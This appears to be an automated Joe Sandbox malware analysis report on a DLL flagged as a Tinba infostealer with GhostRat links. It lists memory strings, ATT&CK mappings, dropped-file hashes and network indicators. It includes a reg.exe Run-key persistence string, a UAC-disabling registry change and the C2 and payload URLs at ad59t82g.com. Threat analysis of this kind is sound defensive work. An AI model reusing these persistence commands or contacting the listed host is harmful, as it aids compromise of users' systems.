Source: rundll32.exe, 0000000A.00000002.2084091302.0000000003251000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 0000000A.00000003.1834552528.0000000003251000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 0000000A.00000003.1876290454.0000000003251000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 0000000A.00000003.1805751796.000000000324F000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 0000000A.00000003.1867581832.0000000003251000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 0000000A.00000003.1805543370.0000000003248000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAWen-GBn
Source: rundll32.exe, 0000000A.00000002.2084091302.000000000320A000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAWS%
Source: C:\Windows\System32\loaddll32.exeAPI call chain: ExitProcess graph end nodegraph_0-9906
Source: C:\Windows\System32\loaddll32.exeCode function: 0_2_6E33D8C6 _memset,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,0_2_6E33D8C6
Source: C:\Windows\System32\loaddll32.exeCode function: 0_2_6E3436B0 LoadLibraryW,GetProcAddress,GetProcAddress,EncodePointer,EncodePointer,GetProcAddress,EncodePointer,GetProcAddress,EncodePointer,GetProcAddress,EncodePointer,GetProcAddress,EncodePointer,DecodePointer,DecodePointer,DecodePointer,DecodePointer,DecodePointer,DecodePointer,0_2_6E3436B0
Source: C:\Windows\System32\loaddll32.exeCode function: 0_2_6E33D8C6 _memset,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,0_2_6E33D8C6
Source: C:\Windows\System32\loaddll32.exeCode function: 0_2_6E33A9D1 IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,0_2_6E33A9D1

HIPS / PFW / Operating System Protection Evasion

barindex
Source: C:\Windows\SysWOW64\rundll32.exeNetwork Connect: 104.21.22.88 80Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\rundll32.exe rundll32.exe "C:\Users\user\Desktop\0Gs0WEGB1E.dll",#1Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exeProcess created: unknown unknownJump to behavior
Source: C:\Windows\SysWOW64\rundll32.exeProcess created: unknown unknownJump to behavior
Source: loaddll32.exe, loaddll32.exe, 00000000.00000002.2900367456.000000006E348000.00000002.00000001.01000000.00000003.sdmp, rundll32.exe, 0000000A.00000002.2088181293.000000006E348000.00000002.00000001.01000000.00000003.sdmp, 0Gs0WEGB1E.dllBinary or memory string: Shell_TrayWnd
Source: loaddll32.exe, loaddll32.exe, 00000000.00000002.2900367456.000000006E348000.00000002.00000001.01000000.00000003.sdmp, rundll32.exe, 0000000A.00000002.2088181293.000000006E348000.00000002.00000001.01000000.00000003.sdmp, 0Gs0WEGB1E.dllBinary or memory string: SHELL_TrayWnd
Source: loaddll32.exe, 00000000.00000002.2900367456.000000006E348000.00000002.00000001.01000000.00000003.sdmp, rundll32.exe, 0000000A.00000002.2088181293.000000006E348000.00000002.00000001.01000000.00000003.sdmp, 0Gs0WEGB1E.dllBinary or memory string: Pragma: no-cacheGETFileSystem_Stdio.dllv4.0.30319%s%s\%sFileSystem_%s%slalala123%text/0SafeMonClassSHELL_TrayWndShell_TrayWnd2.lnkreg.exeadd "HKCU\SOFTWARE\Microsoft\Windows\CurrentVersion\Run" /v demo /t REG_SZ /d ""file:///BkShadowWndClassSOFTWARE\Microsoft\Windows\CurrentVersion\Policies\SystemEnableLUA1511617181920212223242526272829303132333435363738404142434445464748495051525354555657585960616263646566676869707172737475767778798081828384858687888990919293949596979899100101102103104105106107108109110111112113114115116117118120121122123124126127128129130131132133134135136137138139140141142143144145146147148149150151152153154155156157158159160invalid string positionstring too long
Source: C:\Windows\System32\loaddll32.exeCode function: 0_2_6E33B67B GetSystemTimeAsFileTime,__aulldiv,0_2_6E33B67B

Lowering of HIPS / PFW / Operating System Security Settings

barindex
Source: C:\Windows\System32\loaddll32.exeCode function: RegSetValue: SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\SystemEnableLUA0_2_6E3332BD
Source: C:\Windows\SysWOW64\rundll32.exeRegistry value created: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System EnableLUAJump to behavior
Source: loaddll32.exeBinary or memory string: 360tray.exe
ReconnaissanceResource DevelopmentInitial AccessExecutionPersistencePrivilege EscalationDefense EvasionCredential AccessDiscoveryLateral MovementCollectionCommand and ControlExfiltrationImpact
Gather Victim Identity InformationAcquire InfrastructureValid Accounts2
Native API
1
Registry Run Keys / Startup Folder
1
Access Token Manipulation
1
Masquerading
OS Credential Dumping1
System Time Discovery
Remote Services1
Archive Collected Data
1
Encrypted Channel
Exfiltration Over Other Network MediumAbuse Accessibility Features
CredentialsDomainsDefault AccountsScheduled Task/Job1
DLL Side-Loading
112
Process Injection
2
Disable or Modify Tools
LSASS Memory21
Security Software Discovery
Remote Desktop ProtocolData from Removable Media2
Ingress Tool Transfer
Exfiltration Over BluetoothNetwork Denial of Service
Email AddressesDNS ServerDomain AccountsAtLogon Script (Windows)1
Registry Run Keys / Startup Folder
1
Virtualization/Sandbox Evasion
Security Account Manager1
Virtualization/Sandbox Evasion
SMB/Windows Admin SharesData from Network Shared Drive3
Non-Application Layer Protocol
Automated ExfiltrationData Encrypted for Impact
Employee NamesVirtual Private ServerLocal AccountsCronLogin Hook1
DLL Side-Loading
1
Access Token Manipulation
NTDS2
Process Discovery
Distributed Component Object ModelInput Capture3
Application Layer Protocol
Traffic DuplicationData Destruction
Gather Victim Network InformationServerCloud AccountsLaunchdNetwork Logon ScriptNetwork Logon Script112
Process Injection
LSA Secrets1
File and Directory Discovery
SSHKeyloggingFallback ChannelsScheduled TransferData Encrypted for Impact
Domain PropertiesBotnetReplication Through Removable MediaScheduled TaskRC ScriptsRC Scripts1
Obfuscated Files or Information
Cached Domain Credentials2
System Information Discovery
VNCGUI Input CaptureMultiband CommunicationData Transfer Size LimitsService Stop
DNSWeb ServicesExternal Remote ServicesSystemd TimersStartup ItemsStartup Items1
Rundll32
DCSyncRemote System DiscoveryWindows Remote ManagementWeb Portal CaptureCommonly Used PortExfiltration Over C2 ChannelInhibit System Recovery
Network Trust DependenciesServerlessDrive-by CompromiseContainer Orchestration JobScheduled Task/JobScheduled Task/Job1
DLL Side-Loading
Proc FilesystemSystem Owner/User DiscoveryCloud ServicesCredential API HookingApplication Layer ProtocolExfiltration Over Alternative ProtocolDefacement
Hide Legend

Legend:

  • Process
  • Signature
  • Created File
  • DNS/IP Info
  • Is Dropped
  • Is Windows Process
  • Number of created Registry Values
  • Number of created Files
  • Visual Basic
  • Delphi
  • Java
  • .Net C# or VB.NET
  • C, C++ or other language
  • Is malicious
  • Internet

This section contains all screenshots as thumbnails, including those not shown in the slideshow.


windows-stand
SourceDetectionScannerLabelLink
0Gs0WEGB1E.dll42%VirustotalBrowse
0Gs0WEGB1E.dll55%ReversingLabsWin32.Infostealer.Tinba
0Gs0WEGB1E.dll100%Joe Sandbox ML
SourceDetectionScannerLabelLink
C:\Program Files (x86)\mRiZvH\t4d.tmp100%AviraDR/FakePic.Gen
C:\Program Files (x86)\mRiZvH\MSVCP140.dll0%ReversingLabs
C:\Program Files (x86)\mRiZvH\RVQwATT.exe0%ReversingLabs
C:\Program Files (x86)\mRiZvH\VCRUNTIME140.dll0%ReversingLabs
No Antivirus matches
No Antivirus matches
SourceDetectionScannerLabelLink
http://ad59t82g.com/2/text.bmp100%Avira URL Cloudphishing
http://ad59t82g.com/LL6100%Avira URL Cloudphishing
http://ad59t82g.com/2/t1.bmpC:100%Avira URL Cloudphishing
http://ad59t82g.com/2/text.bmpMd100%Avira URL Cloudphishing
http://ad59t82g.com/2/text.bmpHd100%Avira URL Cloudphishing
http://www.dokee.cn0%Avira URL Cloudsafe
http://ad59t82g.com/2/d.bmpbthttp://ad59t82g.com/2/t6.bmphttp://ad59t82g.com/2/text.bmpC:100%Avira URL Cloudphishing
http://ad59t82g.com/13;LY100%Avira URL Cloudphishing
http://www.astrolog.org/astrolog.htm0%Avira URL Cloudsafe
http://ad59t82g.com/79100%Avira URL Cloudphishing
http://ad59t82g.com/f1100%Avira URL Cloudphishing
http://ad59t82g.com/100%Avira URL Cloudphishing
http://www.astrolog.org/astrolog.htmMain0%Avira URL Cloudsafe
http://ad59t82g.com/79;LY100%Avira URL Cloudphishing
http://www.wosign.com/cps/00%Avira URL Cloudsafe
http://crl.wosign.com/WoSignCodeSigning.crl0G0%Avira URL Cloudsafe
http://crt.wosign.com/WoSignCodeSigning.crt00%Avira URL Cloudsafe
http://ad59t82g.com/13LL6100%Avira URL Cloudphishing
NameIPActiveMaliciousAntivirus DetectionReputation
ad59t82g.com
104.21.22.88
truetrue
    unknown
    NameSourceMaliciousAntivirus DetectionReputation
    http://ad59t82g.com/2/text.bmprundll32.exe, 0000000A.00000003.1805543370.000000000323F000.00000004.00000020.00020000.00000000.sdmpfalse
    • Avira URL Cloud: phishing
    unknown
    http://www.astrolog.org/astrolog.htmrundll32.exe, 0000000A.00000003.1925312583.0000000005547000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 0000000A.00000003.2052463388.0000000005409000.00000004.00000020.00020000.00000000.sdmp, FileSystem_Stdio.dll.10.drfalse
    • Avira URL Cloud: safe
    unknown
    https://www.geonames.org/Timezonerundll32.exe, 0000000A.00000003.1925312583.0000000005547000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 0000000A.00000003.2052463388.0000000005409000.00000004.00000020.00020000.00000000.sdmp, FileSystem_Stdio.dll.10.drfalse
      high
      http://ad59t82g.com/13;LYrundll32.exe, 0000000A.00000003.1876290454.0000000003251000.00000004.00000020.00020000.00000000.sdmpfalse
      • Avira URL Cloud: phishing
      unknown
      http://ad59t82g.com/2/d.bmpbthttp://ad59t82g.com/2/t6.bmphttp://ad59t82g.com/2/text.bmpC:rundll32.exe, 0000000A.00000002.2083571808.0000000002DD7000.00000004.00000010.00020000.00000000.sdmpfalse
      • Avira URL Cloud: phishing
      unknown
      http://ad59t82g.com/LL6rundll32.exe, 0000000A.00000003.1805751796.000000000324F000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 0000000A.00000003.1805543370.0000000003248000.00000004.00000020.00020000.00000000.sdmpfalse
      • Avira URL Cloud: phishing
      unknown
      http://www.dokee.cnrundll32.exe, 0000000A.00000003.1887006982.00000000051B4000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 0000000A.00000003.1887027730.00000000051AF000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 0000000A.00000003.1886966921.00000000051A8000.00000004.00000020.00020000.00000000.sdmp, RVQwATT.exe.10.drfalse
      • Avira URL Cloud: safe
      unknown
      http://ad59t82g.com/2/text.bmpMdrundll32.exe, 0000000A.00000003.1805543370.000000000323F000.00000004.00000020.00020000.00000000.sdmpfalse
      • Avira URL Cloud: phishing
      unknown
      http://ad59t82g.com/2/t1.bmpC:rundll32.exe, 0000000A.00000002.2083571808.0000000002DD7000.00000004.00000010.00020000.00000000.sdmpfalse
      • Avira URL Cloud: phishing
      unknown
      http://www.astro.com/swisseph.FileSystem_Stdio.dll.10.drfalse
        high
        http://ad59t82g.com/79rundll32.exe, 0000000A.00000003.1805751796.000000000324F000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 0000000A.00000003.1805543370.0000000003248000.00000004.00000020.00020000.00000000.sdmpfalse
        • Avira URL Cloud: phishing
        unknown
        http://ad59t82g.com/2/text.bmpHdrundll32.exe, 0000000A.00000003.1805543370.000000000323F000.00000004.00000020.00020000.00000000.sdmpfalse
        • Avira URL Cloud: phishing
        unknown
        http://crt.wosign.com/WoSignCodeSigning.crt0rundll32.exe, 0000000A.00000003.1887006982.00000000051B4000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 0000000A.00000003.1887027730.00000000051AF000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 0000000A.00000003.1886966921.00000000051A8000.00000004.00000020.00020000.00000000.sdmp, RVQwATT.exe.10.drfalse
        • Avira URL Cloud: safe
        unknown
        http://www.gnu.orgFileSystem_Stdio.dll.10.drfalse
          high
          http://www.wosign.com/cps/0rundll32.exe, 0000000A.00000003.1887006982.00000000051B4000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 0000000A.00000003.1887027730.00000000051AF000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 0000000A.00000003.1886966921.00000000051A8000.00000004.00000020.00020000.00000000.sdmp, RVQwATT.exe.10.drfalse
          • Avira URL Cloud: safe
          unknown
          https://data.iana.org/time-zones/tz-link.htmlPostScriptrundll32.exe, 0000000A.00000003.1925312583.0000000005547000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 0000000A.00000003.2052463388.0000000005409000.00000004.00000020.00020000.00000000.sdmp, FileSystem_Stdio.dll.10.drfalse
            high
            http://ad59t82g.com/rundll32.exe, 0000000A.00000003.1876290454.0000000003251000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 0000000A.00000003.1805751796.000000000324F000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 0000000A.00000003.1867581832.0000000003251000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 0000000A.00000003.1805543370.0000000003248000.00000004.00000020.00020000.00000000.sdmpfalse
            • Avira URL Cloud: phishing
            unknown
            http://ad59t82g.com/f1rundll32.exe, 0000000A.00000003.1834552528.0000000003251000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 0000000A.00000003.1876290454.0000000003251000.00000004.00000020.00020000.00000000.sdmpfalse
            • Avira URL Cloud: phishing
            unknown
            http://ad59t82g.com/79;LYrundll32.exe, 0000000A.00000003.1834552528.0000000003251000.00000004.00000020.00020000.00000000.sdmpfalse
            • Avira URL Cloud: phishing
            unknown
            http://crl.wosign.com/WoSignCodeSigning.crl0Grundll32.exe, 0000000A.00000003.1887006982.00000000051B4000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 0000000A.00000003.1887027730.00000000051AF000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 0000000A.00000003.1886966921.00000000051A8000.00000004.00000020.00020000.00000000.sdmp, RVQwATT.exe.10.drfalse
            • Avira URL Cloud: safe
            unknown
            https://www.geonames.org/rundll32.exe, 0000000A.00000003.1925312583.0000000005547000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 0000000A.00000003.2052463388.0000000005409000.00000004.00000020.00020000.00000000.sdmp, FileSystem_Stdio.dll.10.drfalse
              high
              http://www.astrolog.org/astrolog.htmMainrundll32.exe, 0000000A.00000003.1925312583.0000000005547000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 0000000A.00000003.2052463388.0000000005409000.00000004.00000020.00020000.00000000.sdmp, FileSystem_Stdio.dll.10.drfalse
              • Avira URL Cloud: safe
              unknown
              http://ad59t82g.com/13LL6rundll32.exe, 0000000A.00000003.1876290454.0000000003251000.00000004.00000020.00020000.00000000.sdmpfalse
              • Avira URL Cloud: phishing
              unknown
              https://data.iana.org/time-zones/tz-link.htmlrundll32.exe, 0000000A.00000003.1925312583.0000000005547000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 0000000A.00000003.2052463388.0000000005409000.00000004.00000020.00020000.00000000.sdmp, FileSystem_Stdio.dll.10.drfalse
                high
                • No. of IPs < 25%
                • 25% < No. of IPs < 50%
                • 50% < No. of IPs < 75%
                • 75% < No. of IPs
                IPDomainCountryFlagASNASN NameMalicious
                104.21.22.88
                ad59t82g.comUnited States
                13335CLOUDFLARENETUStrue
                Joe Sandbox version:41.0.0 Charoite
                Analysis ID:1581150
                Start date and time:2024-12-27 06:21:08 +01:00
                Joe Sandbox product:CloudBasic
                Overall analysis duration:0h 7m 22s
                Hypervisor based Inspection enabled:false
                Report type:full
                Cookbook file name:default.jbs
                Analysis system description:Windows 10 x64 22H2 with Office Professional Plus 2019, Chrome 117, Firefox 118, Adobe Reader DC 23, Java 8 Update 381, 7zip 23.01
                Number of analysed new started processes analysed:42
                Number of new started drivers analysed:0
                Number of existing processes analysed:0
                Number of existing drivers analysed:0
                Number of injected processes analysed:0
                Technologies:
                • HCA enabled
                • EGA enabled
                • AMSI enabled
                Analysis Mode:default
                Analysis stop reason:Timeout
                Sample name:0Gs0WEGB1E.dll
                renamed because original name is a hash value
                Original Sample Name:DF0DA14A75D792B85065BFABAAA38CA8.dll
                Detection:MAL
                Classification:mal100.evad.winDLL@112/8@1/1
                EGA Information:
                • Successful, ratio: 100%
                HCA Information:
                • Successful, ratio: 100%
                • Number of executed functions: 0
                • Number of non-executed functions: 42
                Cookbook Comments:
                • Found application associated with file extension: .dll
                • Exclude process from analysis (whitelisted): SIHClient.exe
                • Excluded IPs from analysis (whitelisted): 20.109.210.53, 184.30.17.174, 13.107.246.63
                • Excluded domains from analysis (whitelisted): fs.microsoft.com, ocsp.digicert.com, slscr.update.microsoft.com, otelrules.azureedge.net, ctldl.windowsupdate.com, fe3cr.delivery.mp.microsoft.com
                • Not all processes where analyzed, report is missing behavior information
                • Report size exceeded maximum capacity and may have missing behavior information.
                • Report size getting too big, too many NtOpenKeyEx calls found.
                • Report size getting too big, too many NtProtectVirtualMemory calls found.
                • Report size getting too big, too many NtQueryValueKey calls found.
                • Some HTTP raw data packets have been limited to 10 per session. Please view the PCAPs for the complete data.
                TimeTypeDescription
                00:22:11API Interceptor4x Sleep call for process: rundll32.exe modified
                05:22:38AutostartRun: HKLM64\Software\Microsoft\Windows\CurrentVersion\Run WINDOWS C:\Program Files (x86)\mRiZvH\RVQwATT.exe
                MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                104.21.22.88photo_2024-09-18_20-00-20.exeGet hashmaliciousGhostRatBrowse
                • ad59t82g.com/1/t2.bmp
                MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                ad59t82g.comphoto_2024-09-18_20-00-20.exeGet hashmaliciousGhostRatBrowse
                • 104.21.22.88
                N6xnw0iEGs.exeGet hashmaliciousGhostRatBrowse
                • 172.67.203.195
                MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                CLOUDFLARENETUSBootstrapper.exeGet hashmaliciousLummaCBrowse
                • 104.21.80.1
                NewI Upd v1.1.0.exeGet hashmaliciousLummaCBrowse
                • 172.67.190.223
                setup.exeGet hashmaliciousLummaCBrowse
                • 172.67.197.192
                exlauncher-unpadded.exeGet hashmaliciousLummaCBrowse
                • 172.67.218.163
                http://kxyaiaqyijjz.comGet hashmaliciousUnknownBrowse
                • 1.1.1.1
                https://pdf-ezy.com/pdf-ez.exeGet hashmaliciousUnknownBrowse
                • 172.67.152.3
                b8ygJBG5cb.msiGet hashmaliciousUnknownBrowse
                • 172.67.194.29
                tBnELFfQoe.exeGet hashmaliciousDCRat, PureLog Stealer, zgRATBrowse
                • 104.21.49.159
                phish_alert_iocp_v1.4.48 - 2024-12-26T095152.060.emlGet hashmaliciousUnknownBrowse
                • 104.17.25.14
                phish_alert_iocp_v1.4.48 - 2024-12-26T092852.527.emlGet hashmaliciousUnknownBrowse
                • 104.17.25.14
                No context
                MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                C:\Program Files (x86)\mRiZvH\MSVCP140.dllphoto_2024-09-18_20-00-20.exeGet hashmaliciousGhostRatBrowse
                  3XRUFJRb3K.dllGet hashmaliciousUnknownBrowse
                    3Kel6xErOk.exeGet hashmaliciousNitolBrowse
                      8CoDx513sS.exeGet hashmaliciousNitolBrowse
                        3XRUFJRb3K.dllGet hashmaliciousUnknownBrowse
                          N6xnw0iEGs.exeGet hashmaliciousGhostRatBrowse
                            nOyswc9ly2.dllGet hashmaliciousUnknownBrowse
                              pXm5oVO3Go.exeGet hashmaliciousNitolBrowse
                                Rudvfa0Z17.exeGet hashmaliciousNitolBrowse
                                  nOyswc9ly2.dllGet hashmaliciousUnknownBrowse
                                    Process:C:\Windows\SysWOW64\rundll32.exe
                                    File Type:PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
                                    Category:dropped
                                    Size (bytes):524288000
                                    Entropy (8bit):0.03656493643185356
                                    Encrypted:false
                                    SSDEEP:
                                    MD5:8E66A0FF82DCE4BDDCB690E7A37B09BA
                                    SHA1:302169ADD87CFDBC4113AA895CF5B7506A25B81D
                                    SHA-256:10339B13076972F3ACE4F6DE38C532E60D94819D713CB058EF98121F6B87B33C
                                    SHA-512:A817C24131F1C18D06639C5F01E6FDC67CF7AB156EFF335F0397C46420001B581775D5B9CD5066DE4EE4979584B7F270413FB093119AC40F46A7922A9A10852E
                                    Malicious:true
                                    Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$........<.A.]...]...]...+5..]...+..!]...+...]...%(..]...%8..]...]..f]...+...]...+0..]...+1..]...+6..]..Rich.]..........................PE..L...cZ.g...........!.........2......._.......................................0............@.........................@J.......6.......0..X....................@.......................................(..@............................................text.............................. ..`.rdata..$...........................@..@.data.......p.......X..............@....rsrc...X....0......................@..@.reloc.......@......................@..B........................................................................................................................................................................................................................................................................................................
                                    Process:C:\Windows\SysWOW64\rundll32.exe
                                    File Type:PE32 executable (DLL) (console) Intel 80386, for MS Windows
                                    Category:dropped
                                    Size (bytes):436600
                                    Entropy (8bit):6.647460578716755
                                    Encrypted:false
                                    SSDEEP:12288:mgU0BGzePo6+J+4P0xYv7IQgihUgiW6QR7t5s03Ooc8dHkC2esMoWKl:I01Po6+J+dxYv7IQgR03Ooc8dHkC2e50
                                    MD5:C092885EA11BD80D35CB55C7D488F1E2
                                    SHA1:BFE2F5141AF49724A54C838B9A9CB6E54C4A6AA5
                                    SHA-256:885A0A146A83B0D5A19B88C4EB6372B648CFAED817BD31D8CD3FB91313DEA13D
                                    SHA-512:8A600CCF97A6D5201BB791A43F16CD4CCD19A8E9DECAE79B8BA3E5200B6E8936649626112B1C6BDB1465AB8AFB395803A68286C76B817245C6077D0536D03344
                                    Malicious:false
                                    Antivirus:
                                    • Antivirus: ReversingLabs, Detection: 0%
                                    Joe Sandbox View:
                                    • Filename: photo_2024-09-18_20-00-20.exe, Detection: malicious, Browse
                                    • Filename: 3XRUFJRb3K.dll, Detection: malicious, Browse
                                    • Filename: 3Kel6xErOk.exe, Detection: malicious, Browse
                                    • Filename: 8CoDx513sS.exe, Detection: malicious, Browse
                                    • Filename: 3XRUFJRb3K.dll, Detection: malicious, Browse
                                    • Filename: N6xnw0iEGs.exe, Detection: malicious, Browse
                                    • Filename: nOyswc9ly2.dll, Detection: malicious, Browse
                                    • Filename: pXm5oVO3Go.exe, Detection: malicious, Browse
                                    • Filename: Rudvfa0Z17.exe, Detection: malicious, Browse
                                    • Filename: nOyswc9ly2.dll, Detection: malicious, Browse
                                    Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......p.. 4.os4.os4.os..nr6.os=..s".os4.ns..osf.nr7.osf.kr?.osf.lr<.osf.jr..osf.or5.osf.s5.osf.mr5.osRich4.os........................PE..L...J(.`.........."!.........~...............0.......................................r....@A.........................T......<c..........................x#.......6...W..8............................W..@............`..8............................text...b........................... ..`.data...L(...0......................@....idata.......`.......2..............@..@.rsrc................J..............@..@.reloc...6.......8...N..............@..B........................................................................................................................................................................................................................................................................................................
                                    Process:C:\Windows\SysWOW64\rundll32.exe
                                    File Type:PE32 executable (GUI) Intel 80386, for MS Windows
                                    Category:dropped
                                    Size (bytes):88168
                                    Entropy (8bit):5.395489376150381
                                    Encrypted:false
                                    SSDEEP:1536:Z2lmwrbw9TSUOTS+u+mgTMKZTE6yStygIOqOwSS/Sfso4ivBIaS33Eu:Z2lmwbgSUcHu6XvIkwh/SUo4ivBIbEu
                                    MD5:E5791842B09CB60905E07D3F1E3DA0EE
                                    SHA1:3EAE10382FE84D8E0F7F10398FFCEAE8ABC0606E
                                    SHA-256:92D79DE5E222282324317855B840ED9A320D44486C2C3573C371005203181F72
                                    SHA-512:585F64B079963DBA7BC0412CC925814849192190B478F785C1481B618A79836F9E740CA2142296310F7CB61C83EB40D26900F2A1F92ECF6A8822EB8DAD611C4B
                                    Malicious:true
                                    Antivirus:
                                    • Antivirus: ReversingLabs, Detection: 0%
                                    Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$...........G.m.G.m.G.m.<.a.E.m.(.f.C.m...c.R.m.(.g.<.m.G.l.!.m.%.~.N.m...\.A.m..k.F.m..i.F.m.RichG.m.........PE..L..../qC.............................8............@..........................`.......9..................................O...T...d....@...............@..h...............................................................x............................text.............................. ..`.rdata........... ..................@..@.data....U.......@..................@....rsrc........@... ... ..............@..@........................................................................................................................................................................................................................................................................................................................................................................
                                    Process:C:\Windows\SysWOW64\rundll32.exe
                                    File Type:PE32 executable (DLL) (console) Intel 80386, for MS Windows
                                    Category:dropped
                                    Size (bytes):79792
                                    Entropy (8bit):6.778797048504205
                                    Encrypted:false
                                    SSDEEP:1536:hExZIDobDaHrrAPsCbU4qzBHXpHolecbGpJGBNzZz3:yZPDaHrrobUHzDQecbGbGN
                                    MD5:9D5A742F221C4929A178BAF2B93FC7FB
                                    SHA1:928C9E0E1C18EC474C2F450CA00A154E44AC547A
                                    SHA-256:F10727074BCB4375F276E48DA64029D370299768536157321FB4BD9B1997B898
                                    SHA-512:F4614962C67BB41B8A2FB17E3112745F4BA012BBF382C1CC7DEACD6C8525A53D75890A2EB46F0DA61BFA054DC52505B09A29291D5FA1C25C6201A66B9DC4B547
                                    Malicious:true
                                    Antivirus:
                                    • Antivirus: ReversingLabs, Detection: 0%
                                    Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$..........M...M...M.....O...D...F...M...d.../..Y.../..X.../..Q.../..L.../.u.L.../..L...RichM...........PE..L...19............"!.........................................................P............@A........................P........ .......0...................'...@......x$..T............................#..@............ ...............................text...d........................... ..`.data...............................@....idata....... ......................@..@.rsrc........0......................@..@.reloc.......@......................@..B................................................................................................................................................................................................................................................................................................................................
                                    Process:C:\Windows\SysWOW64\rundll32.exe
                                    File Type:Zip archive data, at least v2.0 to extract, compression method=store
                                    Category:dropped
                                    Size (bytes):231953
                                    Entropy (8bit):7.999353861689407
                                    Encrypted:true
                                    SSDEEP:6144:vObTef3lX9XiFPCEUlBbcZ8qPTwGTsFVO9:vwOhiFGZk8+wGTsy9
                                    MD5:45C9D684F18C3BE0AE2DC829B2088BAF
                                    SHA1:F3FC5E8F6CB725DB3E9B75C029F4682CF592891C
                                    SHA-256:03DD0B12508985137D3BC73BD83FAEA0CCE0C7D960282EFF21484E7F4D690908
                                    SHA-512:E3782E9A8C1062779A04F3F0228B844998E930039DD3367D1CBAB0FC3FF673C073A1390E850207561B2632F554D260AA53AC4BF5FBFE13CAF962F9F7EF98D3DC
                                    Malicious:false
                                    Preview:PK..........XY................text/UT.....g..g..gPK..........7X........x.......text/MSVCP140.dllUT.....e, .g+V.f5O.....1.u....)..F.....6v..iN!...CM}./...Q..p?.........v....Z.f.h...E..K"U..kN7.t .{.Z..\2....(r._. Bb..T.......=..........}...x.<.4...=w.Vq..CN.......2....kv....X.r7`........3.....b...k..r..s..{{..O...;<.]..!U{.o.....uJB.......7....^)A..;.".1>.5..w....{ >6Z.>......zcqZ.E........Xp...)d....%fn.#.\6Q%..Z...M..0.>....>y..,.d.m.j(..i...A?'.O..i:....9.)...uR%..]..~.?...g..I.....F...N...j.5..x..jHJD{.6"_.9..y.}..8m....N{H..=.i.h...q.~>..Q..)..u".WVh.....>...F.....s....L.C..@ATi..D...Q....../.'}[...e.w........{.._.M.h....Kl........9K.r.lX..&...X.S.T..+.O...A.;+.@,-.W.l..p......0..km.8.......I2.Wc;@...DV..w....}...3.r,.>.e.&.y......*....W....Y..O*= 3.}.b.d.@L``.y.....).../.Nw..."H..G<$....7D1.b..7j.;..Ce...H.$q....9%.....G.....a,.gV.../..J.....&....]..Z...[.[r2.2k..5$.U["......{..%......]...iz1.34)Ym O..[.R.....h..O........s.-\.^...
                                    Process:C:\Windows\SysWOW64\rundll32.exe
                                    File Type:PC bitmap, Windows 3.x format, 556 x 556 x 32, image size 1236544, cbSize 1236598, bits offset 54
                                    Category:dropped
                                    Size (bytes):1236598
                                    Entropy (8bit):7.385530283539845
                                    Encrypted:false
                                    SSDEEP:24576:0bau2DiyFqp34ymXikLSxpAkGZKMoLa7K2DOwIyblYsuGBK+WKOz6Z:0u5Fqp34ymLWxHGZKMoO79DjPbl/ugBW
                                    MD5:994058CE7402806C9BE68E1EE46B6946
                                    SHA1:87B50080C47B9949A5A6E9178784513906F81C98
                                    SHA-256:FC9A6867E3664ACF9E2E39DCD3ED2EF3C259C46FE37CE19ADC67CFD3BE4A4FDA
                                    SHA-512:0814D20E25DADE13ED767990FA85A7BA7914413D7F7A1B917FF4AF17F0A20417807E4A73C3576D557927B8E9E124C98C18D8C59111E235EE96557D93D9363710
                                    Malicious:true
                                    Antivirus:
                                    • Antivirus: Avira, Detection: 100%
